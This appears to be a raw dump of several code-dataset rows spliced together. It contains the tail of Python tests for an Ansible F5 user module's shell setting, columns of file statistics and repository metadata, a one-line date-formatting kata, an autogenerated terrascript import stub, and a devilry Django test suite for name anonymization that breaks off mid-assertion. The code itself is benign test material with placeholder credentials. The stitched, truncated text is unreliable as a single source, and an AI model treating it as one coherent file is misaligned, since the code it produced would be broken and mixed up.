mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
results = mm.exec_module()
assert results['changed'] is True
assert results['shell'] == 'none'
def test_update_user_shell_to_none_shell_attribute_missing(self, *args):
set_module_args(dict(
username_credential='someuser',
shell='none',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
access = [{'name': 'Common', 'role': 'guest'}]
current = Parameters(
params=dict(
user='admin',
partition_access=access
)
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.exists = Mock(return_value=True)
upm.update_on_device = Mock(return_value=True)
upm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
results = mm.exec_module()
assert results['changed'] is False
assert not hasattr(results, 'shell')
def test_update_user_shell_to_bash(self, *args):
set_module_args(dict(
username_credential='someuser',
shell='bash',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
access = [{'name': 'all', 'role': 'admin'}]
current = Parameters(
params=dict(
user='admin',
shell='tmsh',
partition_access=access
)
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.exists = Mock(return_value=True)
upm.update_on_device = Mock(return_value=True)
upm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
results = mm.exec_module()
assert results['changed'] is True
assert results['shell'] == 'bash'
def test_update_user_shell_to_bash_mutliple_roles(self, *args):
set_module_args(dict(
username_credential='someuser',
shell='bash',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
access = [
{'name': 'Common', 'role': 'operator'},
{'name': 'all', 'role': 'guest'}
]
current = Parameters(
params=dict(
user='admin',
shell='tmsh',
partition_access=access
)
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.exists = Mock(return_value=True)
upm.update_on_device = Mock(return_value=True)
upm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
msg = "Shell access is only available to 'admin' or " \
"'resource-admin' roles."
with pytest.raises(F5ModuleError) as ex:
mm.exec_module()
assert str(ex.value) == msg
| 33.528345
| 108
| 0.606046
| 3,227
| 29,572
| 5.331577
| 0.064766
| 0.063296
| 0.082825
| 0.048591
| 0.937693
| 0.937228
| 0.933973
| 0.93095
| 0.925022
| 0.909561
| 0
| 0.005328
| 0.30184
| 29,572
| 881
| 109
| 33.566402
| 0.828005
| 0.080143
| 0
| 0.827637
| 0
| 0
| 0.08949
| 0.013773
| 0
| 0
| 0
| 0
| 0.062407
| 1
| 0.041605
| false
| 0.071322
| 0.016345
| 0
| 0.065379
| 0.001486
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
4a662851c60eb7465797569d448c179069614b16
| 99
|
py
|
Python
|
module00/ex05/kata02.py
|
MedAymenF/42AI-Python-bootcamp
|
41af2221b95b305ee08ee8f582e68700f1a8c32b
|
[
"Apache-2.0"
] | null | null | null |
module00/ex05/kata02.py
|
MedAymenF/42AI-Python-bootcamp
|
41af2221b95b305ee08ee8f582e68700f1a8c32b
|
[
"Apache-2.0"
] | null | null | null |
module00/ex05/kata02.py
|
MedAymenF/42AI-Python-bootcamp
|
41af2221b95b305ee08ee8f582e68700f1a8c32b
|
[
"Apache-2.0"
] | null | null | null |
t = (3, 30, 2019, 9, 25)
print("{:02}/{:02}/{} {:02}:{:02}".format(t[3], t[4], t[2], t[0], t[1]))
| 24.75
| 72
| 0.40404
| 22
| 99
| 1.818182
| 0.590909
| 0.3
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.270588
| 0.141414
| 99
| 3
| 73
| 33
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0.262626
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
4a986e681f67b00e1a2106a4312f605dc21d2121
| 412
|
py
|
Python
|
terrascript/resource/launchdarkly.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
terrascript/resource/launchdarkly.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
terrascript/resource/launchdarkly.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# terrascript/resource/launchdarkly.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:20:56 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.resource.launchdarkly
#
# instead of
#
# >>> import terrascript.resource.launchdarkly.launchdarkly
#
# This is only available for 'official' and 'partner' providers.
from terrascript.resource.launchdarkly.launchdarkly import *
| 27.466667
| 73
| 0.764563
| 49
| 412
| 6.428571
| 0.693878
| 0.24127
| 0.393651
| 0.234921
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033241
| 0.123786
| 412
| 14
| 74
| 29.428571
| 0.839335
| 0.788835
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4a9cc9181a32cd8c52d004cb19d4338a4403b77b
| 30,450
|
py
|
Python
|
devilry/apps/core/tests/test_group_user_lookup.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 29
|
2015-01-18T22:56:23.000Z
|
2020-11-10T21:28:27.000Z
|
devilry/apps/core/tests/test_group_user_lookup.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 786
|
2015-01-06T16:10:18.000Z
|
2022-03-16T11:10:50.000Z
|
devilry/apps/core/tests/test_group_user_lookup.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 15
|
2015-04-06T06:18:43.000Z
|
2021-02-24T12:28:30.000Z
|
from django import test
from django.conf import settings
from model_bakery import baker
from devilry.apps.core import models as core_models
from devilry.apps.core.group_user_lookup import GroupUserLookup
class TestGroupUserLookupViewroleStudent(test.TestCase):
viewrole = 'student'
#
# Test with user role as 'admin'.
# This is the role of the user a student requests the name for.
#
def test_user_role_admin_get_unanonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_adminuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Admin',
shortname='testadmin@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_adminuser, user_role='admin'),
'Test Admin (testadmin@example.com)')
def test_user_role_admin_get_unanonymized_longname_assignment_fully_anonymized(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_adminuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Admin',
shortname='testadmin@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_adminuser, user_role='admin'),
'Test Admin (testadmin@example.com)')
def test_user_role_admin_get_unanonymized_longname_assignment_semi_anonymized(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_adminuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Admin',
shortname='testadmin@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_adminuser, user_role='admin'),
'Test Admin (testadmin@example.com)')
#
# Test with user role as 'examiner'.
# This is the role of the user a student requests the name for.
#
def test_user_role_examiner_get_unanonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner', shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=test_examineruser, period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_examineruser, user_role='examiner'),
'Test Examiner (testexaminer@example.com)')
def test_user_role_examiner_get_unanonymized_shortname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner', shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=test_examineruser, period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(
group_user_lookup.get_plaintext_short_name_from_user(user=test_examineruser, user_role='examiner'),
'testexaminer@example.com')
def test_user_role_examiner_get_anonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner', shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=test_examineruser, period=testassignment.parentnode,
automatic_anonymous_id='Some anonymous name')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_examineruser, user_role='examiner'),
'Some anonymous name')
def test_user_role_examiner_get_anonymized_shortname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner',
shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=test_examineruser, period=testassignment.parentnode,
automatic_anonymous_id='Some anonymous name')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(
group_user_lookup.get_plaintext_short_name_from_user(user=test_examineruser, user_role='examiner'),
'Some anonymous name')
def test_user_role_examiner_get_anonymized_longname_relatedexaminer_does_not_exist(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner',
shortname='testexaminer@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_examineruser, user_role='examiner'),
'User removed from semester')
def test_user_role_examiner_user_is_examiner_and_student_is_not_anonymized_to_themselves(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner',
shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=testuser, period=testassignment.parentnode,
automatic_anonymous_id='Some anonymous name')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=testuser, user_role='examiner'),
'Test Examiner (testexaminer@example.com)')
#
# Test with user role as 'student'.
# This is the role of the user a student requests the name for.
#
def test_user_role_student_get_unanonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student',
shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=test_studentuser,
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_studentuser, user_role='student'),
'Test Student (teststudent@example.com)')
def test_user_role_student_get_unanonymized_shortname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student',
shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=test_studentuser,
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(
group_user_lookup.get_plaintext_short_name_from_user(user=test_studentuser, user_role='student'),
'teststudent@example.com')
def test_user_role_student_does_not_need_to_be_anonymized_for_other_students_assignment_fully_anonymous(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student',
shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=test_studentuser,
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_studentuser, user_role='student'),
'Test Student (teststudent@example.com)')
def test_user_role_student_does_not_need_to_be_anonymized_for_other_students_assignment_semi_anonymous(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student',
shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=test_studentuser)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_studentuser, user_role='student'),
'Test Student (teststudent@example.com)')
class TestGroupUserLookupViewroleExaminer(test.TestCase):
viewrole = 'examiner'
#
# Test with user role as 'admin'.
# This is the role of the user a examiner requests the name for.
#
def test_user_role_admin_get_unanonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_adminuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Admin',
shortname='testadmin@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_adminuser, user_role='admin'),
'Test Admin (testadmin@example.com)')
def test_user_role_admin_get_unanonymized_longname_assignment_fully_anonymized(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_adminuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Admin',
shortname='testadmin@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_adminuser, user_role='admin'),
'Test Admin (testadmin@example.com)')
def test_user_role_admin_get_unanonymized_longname_assignment_semi_anonymized(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_adminuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Admin',
shortname='testadmin@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_adminuser, user_role='admin'),
'Test Admin (testadmin@example.com)')
#
# Test with user role as 'student'.
# This is the role of the user an examiner requests the name for.
#
def test_user_role_student_get_unanonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student', shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=test_studentuser,
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_studentuser, user_role='student'),
'Test Student (teststudent@example.com)')
def test_user_role_student_get_unanonymized_shortname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student', shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=test_studentuser,
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(
group_user_lookup.get_plaintext_short_name_from_user(user=test_studentuser, user_role='student'),
'teststudent@example.com')
def test_user_role_student_get_anonymized_longname_for_assignment_uses_custom_candidate_ids(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS,
uses_custom_candidate_ids=True)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student', shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup,
relatedstudent__user=test_studentuser, candidate_id='1234',
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_studentuser, user_role='student'),
'1234')
def test_user_role_student_get_anonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student', shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=test_studentuser,
relatedstudent__automatic_anonymous_id='Some anonymous name',
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_studentuser, user_role='student'),
'Some anonymous name')
def test_user_role_student_get_anonymized_shortname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student', shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=test_studentuser,
relatedstudent__automatic_anonymous_id='Some anonymous name',
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(
group_user_lookup.get_plaintext_short_name_from_user(user=test_studentuser, user_role='student'),
'Some anonymous name')
def test_user_role_student_get_anonymized_longname_candidate_does_not_exist(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student', shortname='teststudent@example.com')
baker.make('core.RelatedStudent', period=testassignment.parentnode, user=test_studentuser,
automatic_anonymous_id='Some anonymous name')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_studentuser, user_role='student'),
'Some anonymous name')
def test_user_role_student_get_anonymized_longname_no_candidate_or_relatedstudent(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student', shortname='teststudent@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_studentuser, user_role='student'),
'User removed from semester')
def test_user_role_student_user_is_student_and_examiner_is_not_anonymized_to_themselves(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student',
shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=testuser,
relatedstudent__automatic_anonymous_id='Some anonymous name',
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=testuser, user_role='student'),
'Test Student (teststudent@example.com)')
#
# Test with user role as 'examiner'.
# This is the role of the user an examiner requests the name for.
#
def test_user_role_examiner_get_unanonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner', shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=test_examineruser, period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_examineruser, user_role='examiner'),
'Test Examiner (testexaminer@example.com)')
def test_user_role_examiner_get_unanonymized_shortname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner', shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=test_examineruser, period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(
group_user_lookup.get_plaintext_short_name_from_user(user=test_examineruser, user_role='examiner'),
'testexaminer@example.com')
def test_user_role_examiner_does_not_need_to_be_anonymized_assignment_fully_anonymous(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner', shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=test_examineruser, period=testassignment.parentnode,
automatic_anonymous_id='Some anonymous name')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_examineruser, user_role='examiner'),
'Test Examiner (testexaminer@example.com)')
def test_user_role_examiner_does_not_need_to_be_anonymized_assignment_semi_anonymous(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner', shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=test_examineruser, period=testassignment.parentnode,
automatic_anonymous_id='Some anonymous name')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_examineruser, user_role='examiner'),
'Test Examiner (testexaminer@example.com)')
class TestGroupUserLookupViewroleAdmin(test.TestCase):
viewrole = 'admin'
def test_user_role_admin_get_unanonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_adminuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Admin',
shortname='testadmin@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_adminuser, user_role='admin'),
